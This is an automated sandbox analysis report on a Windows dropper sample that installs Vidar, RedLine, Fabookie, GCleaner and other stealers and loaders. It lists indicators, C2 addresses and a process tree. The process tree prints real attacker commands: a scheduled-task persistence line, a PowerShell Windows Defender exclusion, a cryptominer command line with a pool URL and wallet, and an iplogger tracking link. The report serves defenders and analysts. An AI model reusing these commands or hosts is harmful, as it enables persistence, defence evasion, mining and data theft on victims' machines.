fabookie | 8bb4888c50360987410946aecd7aafd426f851330fc5051dc52ebd2fe7e29063

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2024 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe
Size

6.1MB
MD5

19256c0962949d65c1338a2f8e94d665
SHA1

86b6a631bdeff1c80f39166e81971739080dc506
SHA256

8bb4888c50360987410946aecd7aafd426f851330fc5051dc52ebd2fe7e29063
SHA512

2909bf7f349a77344ed1f65195f09796c23a2a0a79d4e0cd1add850429d9ac71f561ac675628254d0c39f2e77031d5680614de6d326842d6328d9f39b1689297
SSDEEP

196608:sO2z6Qr310VkHZIQpWaZaOR0Sa1ggfbJctBhQw30:RU3aJqaORjgXf6tBhQ

Score

10^/10

fabookie gcleaner lgoogloader onlylogger redline sectoprat vidar 1 933 discovery downloader execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

vidar

Version

41.1

Botnet

933

https://mas.to/@bardak1ho

Attributes

profile_id
933

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Extracted

Family

redline

Botnet

193.203.203.82:63851

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023441-117.dat	family_fabookie

Detects LgoogLoader payload 1 IoCs

resource	yara_rule
behavioral2/memory/4576-58-0x00000000014C0000-0x00000000014D2000-memory.dmp	family_lgoogloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/1724-259-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/1724-259-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 1 IoCs

resource	yara_rule
behavioral2/memory/5024-212-0x0000000000400000-0x000000000044C000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/4212-211-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Blocklisted process makes network request 1 IoCs

flow	pid	Process
149	3044	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3380	powershell.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	4MCYlgNAW.eXE
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Chrome 5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	INSTAL~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	setup_2.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	services64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sfx_123_206.exe

Executes dropped EXE 23 IoCs

pid	Process
2668	Chrome 5.exe
4212	Firstoffer.exe
2744	ShadowVPNInstaller_t1.exe
4576	inst3.exe
2900	Install.EXE
3956	OIQVxx
5024	setup.exe
1928	Install.exe
4564	sfx_123_206.exe
2632	setup_2.exe
3056	setup_2.tmp
4644	jhuuee.exe
4376	bskr.exe
2960	setup_2.exe
2976	setup_2.tmp
4328	4MCYlgNAW.eXE
4524	services64.exe
1316	Install.exe
1724	Install.exe
2816	INSTAL~1.EXE
5624	sihost64.exe
1204	e59049a.exe
5544	e5939c3.exe

Loads dropped DLL 4 IoCs

pid	Process
3056	setup_2.tmp
2976	setup_2.tmp
3372	rundll32.exe
3044	rundll32.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Install.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
91	iplogger.org
131	raw.githubusercontent.com
136	pastebin.com
137	pastebin.com
20	iplogger.org
89	iplogger.org
130	raw.githubusercontent.com
17	iplogger.org
36	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4576 set thread context of 3956	4576	inst3.exe	89
PID 1928 set thread context of 1724	1928	Install.exe	151
PID 4524 set thread context of 5924	4524	services64.exe	184

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
3220	2744	WerFault.exe	84
3572	2744	WerFault.exe	84
5016	4376	WerFault.exe	98
1224	2744	WerFault.exe	84
1724	2744	WerFault.exe	84
4412	2744	WerFault.exe	84
4288	4212	WerFault.exe	83
1020	5024	WerFault.exe	90
4584	1204	WerFault.exe	186
5800	5544	WerFault.exe	189

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	INSTAL~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Firstoffer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bskr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4MCYlgNAW.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ShadowVPNInstaller_t1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	control.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	inst3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sfx_123_206.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e59049a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e5939c3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OIQVxx
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2360	taskkill.exe
3924	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3744	schtasks.exe
5692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2668	Chrome 5.exe
1928	Install.exe
1928	Install.exe
3380	powershell.exe
3380	powershell.exe
3380	powershell.exe
3916	msedge.exe
3916	msedge.exe
3232	msedge.exe
3232	msedge.exe
4524	services64.exe
4524	services64.exe
6016	identity_helper.exe
6016	identity_helper.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe
5924	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	2744	ShadowVPNInstaller_t1.exe
Token: SeDebugPrivilege	2744	ShadowVPNInstaller_t1.exe
Token: SeLoadDriverPrivilege	2744	ShadowVPNInstaller_t1.exe
Token: SeDebugPrivilege	4376	bskr.exe
Token: SeDebugPrivilege	2360	taskkill.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeDebugPrivilege	2668	Chrome 5.exe
Token: SeDebugPrivilege	1928	Install.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	4524	services64.exe
Token: SeLockMemoryPrivilege	5924	explorer.exe
Token: SeLockMemoryPrivilege	5924	explorer.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe
3232	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4280 wrote to memory of 2668	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	82
PID 4280 wrote to memory of 2668	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	82
PID 4280 wrote to memory of 4212	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	83
PID 4280 wrote to memory of 4212	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	83
PID 4280 wrote to memory of 4212	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	83
PID 4280 wrote to memory of 2744	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	84
PID 4280 wrote to memory of 2744	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	84
PID 4280 wrote to memory of 2744	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	84
PID 4280 wrote to memory of 4576	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	111
PID 4280 wrote to memory of 4576	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	111
PID 4280 wrote to memory of 4576	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	111
PID 4280 wrote to memory of 2900	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	88
PID 4280 wrote to memory of 2900	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	88
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4576 wrote to memory of 3956	4576	inst3.exe	89
PID 4280 wrote to memory of 5024	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	90
PID 4280 wrote to memory of 5024	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	90
PID 4280 wrote to memory of 5024	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	90
PID 2900 wrote to memory of 1928	2900	Install.EXE	91
PID 2900 wrote to memory of 1928	2900	Install.EXE	91
PID 2900 wrote to memory of 1928	2900	Install.EXE	91
PID 4280 wrote to memory of 4564	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	93
PID 4280 wrote to memory of 4564	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	93
PID 4280 wrote to memory of 4564	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	93
PID 4280 wrote to memory of 2632	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	94
PID 4280 wrote to memory of 2632	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	94
PID 4280 wrote to memory of 2632	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	94
PID 2632 wrote to memory of 3056	2632	setup_2.exe	95
PID 2632 wrote to memory of 3056	2632	setup_2.exe	95
PID 2632 wrote to memory of 3056	2632	setup_2.exe	95
PID 4280 wrote to memory of 4644	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	96
PID 4280 wrote to memory of 4644	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	96
PID 4564 wrote to memory of 1068	4564	sfx_123_206.exe	97
PID 4564 wrote to memory of 1068	4564	sfx_123_206.exe	97
PID 4564 wrote to memory of 1068	4564	sfx_123_206.exe	97
PID 4280 wrote to memory of 4376	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	98
PID 4280 wrote to memory of 4376	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	98
PID 4280 wrote to memory of 4376	4280	19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe	98
PID 3056 wrote to memory of 2960	3056	setup_2.tmp	99
PID 3056 wrote to memory of 2960	3056	setup_2.tmp	99
PID 3056 wrote to memory of 2960	3056	setup_2.tmp	99
PID 2960 wrote to memory of 2976	2960	setup_2.exe	100
PID 2960 wrote to memory of 2976	2960	setup_2.exe	100
PID 2960 wrote to memory of 2976	2960	setup_2.exe	100
PID 1068 wrote to memory of 2020	1068	mshta.exe	101
PID 1068 wrote to memory of 2020	1068	mshta.exe	101
PID 1068 wrote to memory of 2020	1068	mshta.exe	101
PID 2020 wrote to memory of 4328	2020	cmd.exe	103
PID 2020 wrote to memory of 4328	2020	cmd.exe	103
PID 2020 wrote to memory of 4328	2020	cmd.exe	103
PID 2020 wrote to memory of 2360	2020	cmd.exe	104
PID 2020 wrote to memory of 2360	2020	cmd.exe	104
PID 2020 wrote to memory of 2360	2020	cmd.exe	104
PID 4328 wrote to memory of 1704	4328	4MCYlgNAW.eXE	110

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\19256c0962949d65c1338a2f8e94d665_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:2544
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3744
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4524
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:5544
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5692
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:5624
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5924
- C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
  "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4212
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1032
    3⤵
    - Program crash
    PID:4288
- C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe
  "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 336
    3⤵
    - Program crash
    PID:3220
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 564
    3⤵
    - Program crash
    PID:3572
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 584
    3⤵
    - Program crash
    PID:1224
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 612
    3⤵
    - Program crash
    PID:1724
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 724
    3⤵
    - Program crash
    PID:4412
- C:\Users\Admin\AppData\Local\Temp\inst3.exe
  "C:\Users\Admin\AppData\Local\Temp\inst3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Users\Admin\AppData\Local\Temp\xnYHaMkotIKyFYFGWL\OIQVxx
    C:\Users\Admin\AppData\Local\Temp\xnYHaMkotIKyFYFGWL\OIQVxx
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3956
- C:\Users\Admin\AppData\Local\Temp\Install.EXE
  "C:\Users\Admin\AppData\Local\Temp\Install.EXE"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
      4⤵
      Executes dropped EXE
      PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1724
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1018.tmp\Install.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:4424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1NEph7
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3232
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa0d3446f8,0x7ffa0d344708,0x7ffa0d344718
        6⤵
        
        PID:3516
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
